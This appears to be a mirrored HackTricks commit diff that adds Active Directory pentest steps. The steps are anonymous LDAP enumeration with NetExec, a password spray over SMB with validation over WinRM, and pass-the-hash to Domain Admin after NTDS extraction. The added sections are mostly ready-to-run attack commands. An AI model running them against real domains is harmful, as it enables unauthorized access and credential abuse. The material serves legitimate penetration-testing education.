mirror of
https://github.com/HackTricks-wiki/hacktricks.git
synced 2025-10-10 18:36:50 +00:00
Merge branch 'master' of github.com:HackTricks-wiki/hacktricks
This commit is contained in:
commit
afed17d408
@ -93,6 +93,33 @@ ldapsearch -H ldaps://company.com:636/ -x -s base -b '' "(objectClass=*)" "*" +
|
||||
[LDAP anonymous binds](https://docs.microsoft.com/en-us/troubleshoot/windows-server/identity/anonymous-ldap-operations-active-directory-disabled) allow **unauthenticated attackers** to retrieve information from the domain, such as a complete listing of users, groups, computers, user account attributes, and the domain password policy. This is a **legacy configuration**, and as of Windows Server 2003, only authenticated users are permitted to initiate LDAP requests.\
|
||||
However, admins may have needed to **set up a particular application to allow anonymous binds** and given out more than the intended amount of access, thereby giving unauthenticated users access to all objects in AD.
|
||||
|
||||
### Anonymous LDAP enumeration with NetExec (null bind)
|
||||
|
||||
If null/anonymous bind is allowed, you can pull users, groups, and attributes directly via NetExec’s LDAP module without creds. Useful filters:
|
||||
- (objectClass=*) to inventory objects under a base DN
|
||||
- (sAMAccountName=*) to harvest user principals
|
||||
|
||||
Examples:
|
||||
|
||||
```bash
|
||||
# Enumerate objects from the root DSE (base DN autodetected)
|
||||
netexec ldap <DC_FQDN> -u '' -p '' --query "(objectClass=*)" ""
|
||||
|
||||
# Dump users with key attributes for spraying and targeting
|
||||
netexec ldap <DC_FQDN> -u '' -p '' --query "(sAMAccountName=*)" ""
|
||||
|
||||
# Extract just the sAMAccountName field into a list
|
||||
netexec ldap <DC_FQDN> -u '' -p '' --query "(sAMAccountName=*)" "" \
|
||||
| awk -F': ' '/sAMAccountName:/ {print $2}' | sort -u > users.txt
|
||||
```
|
||||
|
||||
What to look for:
|
||||
- sAMAccountName, userPrincipalName
|
||||
- memberOf and OU placement to scope targeted sprays
|
||||
- pwdLastSet (temporal patterns), userAccountControl flags (disabled, smartcard required, etc.)
|
||||
|
||||
Note: If anonymous bind is not permitted, you’ll typically see an Operations error indicating a bind is required.
|
||||
|
||||
## Valid Credentials
|
||||
|
||||
If you have valid credentials to login into the LDAP server, you can dump all the information about the Domain Admin using:
|
||||
@ -300,13 +327,13 @@ You can download **pbis** from here: [https://github.com/BeyondTrust/pbis-open/]
|
||||
./list-groups-for-user <username>
|
||||
./lsa list-groups-for-user <username>
|
||||
#Get groups of each user
|
||||
./enum-users | grep "Name:" | sed -e "s,\\\,\\\\\\\,g" | awk '{print $2}' | while read name; do ./list-groups-for-user "$name"; echo -e "========================\n"; done
|
||||
./enum-users | grep "Name:" | sed -e "s,\\,\\\\\\,g" | awk '{print $2}' | while read name; do ./list-groups-for-user "$name"; echo -e "========================\n"; done
|
||||
|
||||
#Get users of a group
|
||||
./enum-members --by-name "domain admins"
|
||||
./lsa enum-members --by-name "domain admins"
|
||||
#Get users of each group
|
||||
./enum-groups | grep "Name:" | sed -e "s,\\\,\\\\\\\,g" | awk '{print $2}' | while read name; do echo "$name"; ./enum-members --by-name "$name"; echo -e "========================\n"; done
|
||||
./enum-groups | grep "Name:" | sed -e "s,\\,\\\\\\,g" | awk '{print $2}' | while read name; do echo "$name"; ./enum-members --by-name "$name"; echo -e "========================\n"; done
|
||||
|
||||
#Get description of each user
|
||||
./adtool -a search-user --name CN="*" --keytab=/etc/krb5.keytab -n <Username> | grep "CN" | while read line; do
|
||||
@ -428,6 +455,10 @@ Entry_7:
|
||||
Command: nxc ldap <IP> -u <USERNAME> -p <PASSWORD> --bloodhound -c All -d <DOMAIN.LOCAL> --dns-server <IP> --dns-tcp
|
||||
```
|
||||
|
||||
{{#include ../banners/hacktricks-training.md}}
|
||||
## References
|
||||
|
||||
- [HTB: Baby — Anonymous LDAP → Password Spray → SeBackupPrivilege → Domain Admin](https://0xdf.gitlab.io/2025/09/19/htb-baby.html)
|
||||
- [NetExec (CME successor)](https://github.com/Pennyw0rth/NetExec)
|
||||
- [Microsoft: Anonymous LDAP operations to Active Directory are disabled](https://docs.microsoft.com/en-us/troubleshoot/windows-server/identity/anonymous-ldap-operations-active-directory-disabled)
|
||||
|
||||
{{#include ../banners/hacktricks-training.md}}
|
@ -44,6 +44,23 @@ crackmapexec smb <IP> -u users.txt -p passwords.txt
|
||||
crackmapexec smb --local-auth 10.10.10.10/23 -u administrator -H 10298e182387f9cab376ecd08491764a0 | grep +
|
||||
```
|
||||
|
||||
- Using **NetExec (CME successor)** for targeted, low-noise spraying across SMB/WinRM:
|
||||
|
||||
```bash
|
||||
# Optional: generate a hosts entry to ensure Kerberos FQDN resolution
|
||||
netexec smb <DC_IP> --generate-hosts-file hosts && cat hosts /etc/hosts | sudo sponge /etc/hosts
|
||||
|
||||
# Spray a single candidate password against harvested users over SMB
|
||||
netexec smb <DC_FQDN> -u users.txt -p 'Password123!' \
|
||||
--continue-on-success --no-bruteforce --shares
|
||||
|
||||
# Validate a hit over WinRM (or use SMB exec methods)
|
||||
netexec winrm <DC_FQDN> -u <username> -p 'Password123!' -x "whoami"
|
||||
|
||||
# Tip: sync your clock before Kerberos-based auth to avoid skew issues
|
||||
sudo ntpdate <DC_FQDN>
|
||||
```
|
||||
|
||||
- Using [**kerbrute**](https://github.com/ropnop/kerbrute) (Go)
|
||||
|
||||
```bash
|
||||
@ -265,6 +282,7 @@ To use any of these tools, you need a user list and a password / a small list of
|
||||
- [www.blackhillsinfosec.com/?p=5296](https://www.blackhillsinfosec.com/?p=5296)
|
||||
- [https://hunter2.gitbook.io/darthsidious/initial-access/password-spraying](https://hunter2.gitbook.io/darthsidious/initial-access/password-spraying)
|
||||
- [HTB Sendai – 0xdf: from spray to gMSA to DA/SYSTEM](https://0xdf.gitlab.io/2025/08/28/htb-sendai.html)
|
||||
- [HTB: Baby — Anonymous LDAP → Password Spray → SeBackupPrivilege → Domain Admin](https://0xdf.gitlab.io/2025/09/19/htb-baby.html)
|
||||
|
||||
|
||||
{{#include ../../banners/hacktricks-training.md}}
|
@ -141,6 +141,16 @@ reg save HKLM\SAM SAM.SAV
|
||||
secretsdump.py -ntds ntds.dit -system SYSTEM -hashes lmhash:nthash LOCAL
|
||||
```
|
||||
|
||||
5. Post-extraction: Pass-the-Hash to DA
|
||||
|
||||
```bash
|
||||
# Use the recovered Administrator NT hash to authenticate without the cleartext password
|
||||
netexec winrm <DC_FQDN> -u Administrator -H <ADMIN_NT_HASH> -x "whoami"
|
||||
|
||||
# Or execute via SMB using an exec method
|
||||
netexec smb <DC_FQDN> -u Administrator -H <ADMIN_NT_HASH> --exec-method smbexec -x cmd
|
||||
```
|
||||
|
||||
#### Using wbadmin.exe
|
||||
|
||||
1. Set up NTFS filesystem for SMB server on attacker machine and cache SMB credentials on the target machine.
|
||||
@ -313,9 +323,7 @@ Get-NetGroupMember -Identity "Server Operators" -Recurse
|
||||
- [https://github.com/FuzzySecurity/Capcom-Rootkit/blob/master/Driver/Capcom.sys](https://github.com/FuzzySecurity/Capcom-Rootkit/blob/master/Driver/Capcom.sys)
|
||||
- [https://posts.specterops.io/a-red-teamers-guide-to-gpos-and-ous-f0d03976a31e](https://posts.specterops.io/a-red-teamers-guide-to-gpos-and-ous-f0d03976a31e)
|
||||
- [https://undocumented.ntinternals.net/index.html?page=UserMode%2FUndocumented%20Functions%2FExecutable%20Images%2FNtLoadDriver.html](https://undocumented.ntinternals.net/index.html?page=UserMode%2FUndocumented%20Functions%2FExecutable%20Images%2FNtLoadDriver.html)
|
||||
- [HTB: Baby — Anonymous LDAP → Password Spray → SeBackupPrivilege → Domain Admin](https://0xdf.gitlab.io/2025/09/19/htb-baby.html)
|
||||
|
||||
|
||||
{{#include ../../banners/hacktricks-training.md}}
|
||||
|
||||
|
||||
|
||||
{{#include ../../banners/hacktricks-training.md}}
|
Loading…
x
Reference in New Issue
Block a user